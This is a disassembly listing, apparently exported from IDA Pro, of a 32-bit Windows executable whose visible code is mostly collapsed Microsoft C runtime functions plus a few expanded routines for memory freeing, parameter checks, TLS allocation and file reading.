sub_402FFB proc near ; DATA XREF: .rdata:off_41D38C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_402FED
test [esp+4+arg_0], 1
jz short loc_403011
push esi ; Memory
call j__free
pop ecx
loc_403011: ; CODE XREF: sub_402FFB+D�j
mov eax, esi
pop esi
retn 4
sub_402FFB endp
; [0000001B BYTES: COLLAPSED FUNCTION unknown_libname_8. PRESS KEYPAD "+" TO EXPAND]
; [00000019 BYTES: COLLAPSED FUNCTION std::bad_alloc::bad_alloc(void). PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
; [000000BA BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN12_0. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000145 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN18. PRESS KEYPAD "+" TO EXPAND]
; [0000000D BYTES: COLLAPSED FUNCTION _srand. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION __vsnprintf_l. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000073 BYTES: COLLAPSED FUNCTION __fclose_nolock. PRESS KEYPAD "+" TO EXPAND]
; [00000071 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION $LN13_2. PRESS KEYPAD "+" TO EXPAND]
; [00000008 BYTES: COLLAPSED FUNCTION $LN10. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __time64. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION _vscan_fn. PRESS KEYPAD "+" TO EXPAND]
; [0000001F BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000002F BYTES: COLLAPSED CHUNK OF FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION _V6_HeapAlloc. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN8_1. PRESS KEYPAD "+" TO EXPAND]
; [000000C3 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [000000BF BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _feof. PRESS KEYPAD "+" TO EXPAND]
; [00000196 BYTES: COLLAPSED FUNCTION __fread_nolock_s. PRESS KEYPAD "+" TO EXPAND]
; [000000BD BYTES: COLLAPSED FUNCTION _fread_s. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN15_0. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000011D BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j__atol. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000041 BYTES: COLLAPSED FUNCTION _check_managed_app. PRESS KEYPAD "+" TO EXPAND]
; [000001E0 BYTES: COLLAPSED FUNCTION ___tmainCRTStartup. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN39. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041BB proc near ; CODE XREF: sub_40121E+58�p
; unknown_libname_5+F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3D8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_4041EE
test byte ptr [eax], 8
jz short loc_4041EE
mov [ebp+var_C], 1994000h
loc_4041EE: ; CODE XREF: sub_4041BB+25�j
; sub_4041BB+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call near ptr 436000h
add cl, cl
retn 8
sub_4041BB endp
; [0000002B BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; [00000007 BYTES: COLLAPSED FUNCTION sub_404235. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION unknown_libname_9. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION ___CxxFrameHandler3. PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [000000D5 BYTES: COLLAPSED FUNCTION unknown_libname_11. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [00000073 BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION __CreateFrameInfo. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION __IsExceptionObjectToBeDestroyed. PRESS KEYPAD "+" TO EXPAND]
; [0000004C BYTES: COLLAPSED FUNCTION __FindAndUnlinkFrame. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION __EH_prolog3. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __EH_prolog3_catch. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __EH_prolog3_GS. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __EH_epilog3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40467F proc near ; CODE XREF: sub_40177B:loc_4019EB�p
; sub_4019F3:loc_401C15�p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402710
jmp __EH_epilog3
sub_40467F endp
; [00000104 BYTES: COLLAPSED FUNCTION ___report_gsfailure. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000055 BYTES: COLLAPSED FUNCTION setSBCS(threadmbcinfostruct *). PRESS KEYPAD "+" TO EXPAND]
; [0000018A BYTES: COLLAPSED FUNCTION setSBUpLow(threadmbcinfostruct *). PRESS KEYPAD "+" TO EXPAND]
; [00000098 BYTES: COLLAPSED FUNCTION ___updatetmbcinfo. PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION $LN18_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN13_4. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION getSystemCP(int). PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __setmbcp_nolock. PRESS KEYPAD "+" TO EXPAND]
; [00000161 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp short $LN28
; ---------------------------------------------------------------------------
; [0000002E BYTES: COLLAPSED CHUNK OF FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000140 BYTES: COLLAPSED FUNCTION ___freetlocinfo. PRESS KEYPAD "+" TO EXPAND]
; [00000086 BYTES: COLLAPSED FUNCTION ___addlocaleref. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION ___removelocaleref. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __updatetlocinfoEx_nolock. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION ___updatetlocinfo. PRESS KEYPAD "+" TO EXPAND]
; [0000000C BYTES: COLLAPSED FUNCTION $LN11_2. PRESS KEYPAD "+" TO EXPAND]
; [00000063 BYTES: COLLAPSED FUNCTION __encode_pointer. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __encoded_null. PRESS KEYPAD "+" TO EXPAND]
; [00000063 BYTES: COLLAPSED FUNCTION __decode_pointer. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4051F6 proc near ; DATA XREF: __mtinit+8A�o
; .data:off_425E04�o
call ds:dword_41D180 ; TlsAlloc
retn 4
sub_4051F6 endp
; [0000002A BYTES: COLLAPSED FUNCTION ___set_flsgetvalue. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __mtterm. PRESS KEYPAD "+" TO EXPAND]
; [000000AB BYTES: COLLAPSED FUNCTION __initptd. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN9_1. PRESS KEYPAD "+" TO EXPAND]
; [00000083 BYTES: COLLAPSED FUNCTION __getptd_noexit. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __getptd. PRESS KEYPAD "+" TO EXPAND]
; [00000109 BYTES: COLLAPSED FUNCTION _freefls(x). PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION $LN27_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN19_0. PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION $LN28_0. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN23. PRESS KEYPAD "+" TO EXPAND]
; [00000184 BYTES: COLLAPSED FUNCTION __mtinit. PRESS KEYPAD "+" TO EXPAND]
; [00000117 BYTES: COLLAPSED FUNCTION __tolower_l. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION __get_errno_from_oserr. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION __errno. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION ___doserrno. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000061 BYTES: COLLAPSED FUNCTION ___ascii_strnicmp. PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION __mtinitlocks. PRESS KEYPAD "+" TO EXPAND]
; [00000055 BYTES: COLLAPSED FUNCTION __mtdeletelocks. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __unlock. PRESS KEYPAD "+" TO EXPAND]
; [000000BA BYTES: COLLAPSED FUNCTION __mtinitlocknum. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN14_2. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION __lock. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000314 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B0 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002E3 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000196 BYTES: COLLAPSED FUNCTION __except_handler4. PRESS KEYPAD "+" TO EXPAND]
; [00000160 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; [00000975 BYTES: COLLAPSED FUNCTION __output_l. PRESS KEYPAD "+" TO EXPAND]
db 8Dh, 49h, 0
off_40734F dd offset $NORMAL_STATE$25379 ; DATA XREF: __output_l+1A2�r
dd offset $LN130 ; jump table for switch statement
dd offset $LN129
dd offset $LN121
dd offset $LN117
dd offset $LN116
dd offset $LN112
dd offset $LN96
align 10h
; [00000365 BYTES: COLLAPSED FUNCTION unknown_libname_13. PRESS KEYPAD "+" TO EXPAND]
; [00000065 BYTES: COLLAPSED FUNCTION _strcpy_s. PRESS KEYPAD "+" TO EXPAND]
; [00000040 BYTES: COLLAPSED FUNCTION unknown_libname_53. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION unknown_libname_55. PRESS KEYPAD "+" TO EXPAND]
; [0000004B BYTES: COLLAPSED FUNCTION unknown_libname_57. PRESS KEYPAD "+" TO EXPAND]
; [00000050 BYTES: COLLAPSED FUNCTION unknown_libname_59. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION ___crtCorExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION ___crtExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __lockexit. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __unlockexit. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __initterm_e. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_407906 proc near ; CODE XREF: ___heap_select+12�p
; ___crtInitCritSecAndSpinCount+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40792E
loc_407911: ; CODE XREF: sub_407906+2F�j
call __errno
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call __invalid_parameter
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40792E: ; CODE XREF: sub_407906+9�j
mov eax, dword_425F78
cmp eax, esi
jz short loc_407911
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407906 endp
; =============== S U B R O U T I N E =======================================
sub_40793D proc near ; CODE XREF: ___heap_select+2D�p
; sub_40F524+11F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407965
loc_407948: ; CODE XREF: sub_40793D+2E�j
call __errno
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call __invalid_parameter
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407965: ; CODE XREF: sub_40793D+9�j
cmp dword_425F78, esi
jz short loc_407948
mov ecx, dword_425F84
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40793D endp
; [00000092 BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION $LN15_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000006 BYTES: COLLAPSED CHUNK OF FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION $LN26_0. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [0000004C BYTES: COLLAPSED FUNCTION __init_pointers. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: __invoke_watson+CE�p
; __invalid_parameter+18�p ...
and dword_434DC4, 0
retn
sub_407B65 endp
; ---------------------------------------------------------------------------
align 10h
; [0000007A BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000365 BYTES: COLLAPSED FUNCTION unknown_libname_61. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_402FED+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421518
call __SEH_prolog4
push 0Eh
call __lock
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_407FA6
mov eax, dword_425FC0
mov edx, offset dword_425FBC
loc_407F81: ; CODE XREF: sub_407F55+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_407F99
cmp [eax], ecx
jnz short loc_407FB8
mov ecx, [eax+4]
mov [edx+4], ecx
push eax ; Memory
call _free
pop ecx
loc_407F99: ; CODE XREF: sub_407F55+31�j
push dword ptr [esi+4] ; Memory
call _free
pop ecx
and dword ptr [esi+4], 0
loc_407FA6: ; CODE XREF: sub_407F55+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FBC
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407FB8: ; CODE XREF: sub_407F55+35�j
mov edx, eax
jmp short loc_407F81
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FBC proc near ; CODE XREF: sub_407F55+58�p
; DATA XREF: .rdata:00421530�o
push 0Eh
call __unlock
pop ecx
retn
sub_407FBC endp
; ---------------------------------------------------------------------------
align 10h
; [00000088 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_408058 proc near ; CODE XREF: __init_pointers+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_425FC4, eax
retn
sub_408058 endp
; [00000022 BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_408084 proc near ; CODE XREF: __flsbuf+76�p __flsbuf+82�p ...
mov eax, offset off_423950
retn
sub_408084 endp
; [000000B1 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION __lock_file. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __lock_file2. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION __unlock_file. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __unlock_file2. PRESS KEYPAD "+" TO EXPAND]
; [000002A2 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [0000011A BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000003 BYTES: COLLAPSED FUNCTION $LN25. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN19_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; [000000D6 BYTES: COLLAPSED FUNCTION __local_unwind4. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind4(x). PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _EH4_CallFilterFunc(x,x). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000019 BYTES: COLLAPSED CHUNK OF FUNCTION __except_handler4. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION _EH4_GlobalUnwind(x). PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _EH4_LocalUnwind(x,x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [00000096 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000240 BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __fileno. PRESS KEYPAD "+" TO EXPAND]
; [00000094 BYTES: COLLAPSED FUNCTION __close_nolock. PRESS KEYPAD "+" TO EXPAND]
; [000000C3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION $LN14_4. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [00000062 BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; [00000042 BYTES: COLLAPSED FUNCTION __fflush_nolock. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION $LN31. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION $LN24_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001E BYTES: COLLAPSED CHUNK OF FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN20_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_408D58 proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_408D58 endp
; ---------------------------------------------------------------------------
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
; [00000054 BYTES: COLLAPSED FUNCTION ___check_float_string. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __inc. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __whiteout. PRESS KEYPAD "+" TO EXPAND]
; [00000C4D BYTES: COLLAPSED FUNCTION __input_l. PRESS KEYPAD "+" TO EXPAND]
; [000001A0 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000120 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000005A2 BYTES: COLLAPSED FUNCTION __read_nolock. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A34F(int,int,size_t Size)
sub_40A34F proc near ; CODE XREF: __fread_nolock_s+C9�p
; __filbuf+73�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Size = dword ptr 10h
push 10h
push offset dword_4215C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A37E
call ___doserrno
and dword ptr [eax], 0
call __errno
mov dword ptr [eax], 9
loc_40A376: ; CODE XREF: sub_40A34F+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A41B
; ---------------------------------------------------------------------------
loc_40A37E: ; CODE XREF: sub_40A34F+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A38C
cmp eax, dword_433C84
jb short loc_40A3AD
loc_40A38C: ; CODE XREF: sub_40A34F+33�j
; sub_40A34F+7C�j
call ___doserrno
mov [eax], edi
call __errno
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call __invalid_parameter
add esp, 14h
jmp short loc_40A376
; ---------------------------------------------------------------------------
loc_40A3AD: ; CODE XREF: sub_40A34F+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A38C
push eax
call ___lock_fhandle
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A3F6
push [ebp+Size] ; Size
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
call __read_nolock
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F6: ; CODE XREF: sub_40A34F+8F�j
call __errno
mov dword ptr [eax], 9
call ___doserrno
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A40C: ; CODE XREF: sub_40A34F+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A421
mov eax, [ebp+var_1C]
loc_40A41B: ; CODE XREF: sub_40A34F+2A�j
call __SEH_epilog4
retn
sub_40A34F endp
; =============== S U B R O U T I N E =======================================
sub_40A421 proc near ; CODE XREF: sub_40A34F+C4�p
; DATA XREF: .rdata:004215D8�o
push dword ptr [ebp+8]
call __unlock_fhandle
pop ecx
retn
sub_40A421 endp
; [0000027A BYTES: COLLAPSED FUNCTION ___libm_error_support. PRESS KEYPAD "+" TO EXPAND]
db 8Bh, 0FFh
off_40A6A7 dd offset $LN26_1 ; DATA XREF: ___libm_error_support+1DA�r
dd offset $LN24_2 ; jump table for switch statement
dd offset $LN22_0
dd offset $LN20_3
dd offset $LN18_3
dd offset $LN16_2
dd offset $LN36
dd offset $LN12_3
dd offset $LN30
dd offset $LN8_3
dd offset $LN6_0
dd offset $LN4
dd offset $LN2
